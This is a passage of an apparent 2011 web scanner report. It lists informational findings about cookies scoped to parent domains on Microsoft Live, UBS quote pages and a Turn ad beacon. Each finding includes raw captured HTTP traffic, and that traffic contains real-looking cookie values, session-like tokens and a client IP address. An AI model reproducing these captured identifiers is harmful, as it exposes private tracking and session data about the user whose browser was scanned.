Set-Cookie: d=EO8AFPaeApll_6ixz4EBrAEBlAeB1Q4eqT0eThocKRkoxJavgQCIEACWCmAObyviDOFdHhDRDhDRmS5bkrFrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q; expires=Tue, 04-Oct-2011 15:39:02 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Wed, 06 Jul 2011 15:39:02 GMT
Server: QS

GIF89a.......,.................D..;

9.32. http://profile.live.com/badge/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft+News+Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png HTTP/1.1
Host: profile.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; sc_clustbl_142=6725091ecd4325b02:nK2egy9F4YAy3X0iJIsk4gWz/TnLERdzTYsLBI8gS4dY1I1zZH7VdzxoWPietMFwJ+QtJqQopIgEEkfF8AtEkdCRD5CVTskP/DRQUugWImwwVCCEmH0dJyGBA/G61wU3f520yqTm46/CX4/Eyo6aSA==; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950981&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1
Server: Microsoft-IIS/7.5
X-Imf: 8b22b2cd-4263-44ba-aaeb-e42b091bf16a
Set-Cookie: E=P:bOIwReUJzog=:+1yDfpFa5Q6cY2Ra7+2GtI6CZeM5y7anIF6uyN3OFUc=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: SABadge=msg=&url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft%20News%20Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png&ctype=link&swfurl=&height=&width=&emv=; expires=Thu, 07-Jul-2011 11:16:21 GMT; path=/Badge/
Set-Cookie: sc_clustbl_142=d751af858b13d51f; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC667 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Content-Length: 314

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1309950981&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

9.33. https://quotes-public.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public.ubs.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/home HTTP/1.1
Host: quotes-public1.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com; Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:52:26 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:06:32 GMT; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/legChooseDomicile
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/de

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/de HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:51 GMT
Server: Apache
Set-Cookie: ubslang=de-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=wwy/bl/536LcaMPi7GA/Za5JB+9u0vIfbxz1PWDLCjlHhr4eOK5kCvNkSrvKkTm5roTeIgMCGhY-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/en

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/en HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:53 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=6G2OGI4Mofoqm3Bjc1IRFE50rP8F7k2B0jFsSxftOEdoQcPDAFecRqYUR7Aq9MgK2AOPyJpTcGA-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/fr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/fr HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=fr-CH; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=Wyg33L33zBKvKRR1J07MC3T0k3Ho/EjMtEtx3rdubNAr32qz8nf8xwGoImu5je3zV/T53mEjDdg-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/it

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/it HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=it-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=tyKPlvE7DsLkcB09TcOGFUhMhpU2+qTbpNwNpzilJDEKEJ4haF5DeoAANdBD35geyk8nTgKuvAI-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.39. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=dLIuOGfOzkZylUaPcW45J1NM3fA_ZnR2d4cPbuMElFEvYxI1ZImxMCpPyY8hh_IBrR-1pVaDIemsGHXtH-_-EA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo
2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; 
fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xa
xbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; rv=1; 
uid=4325897289836481830; rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
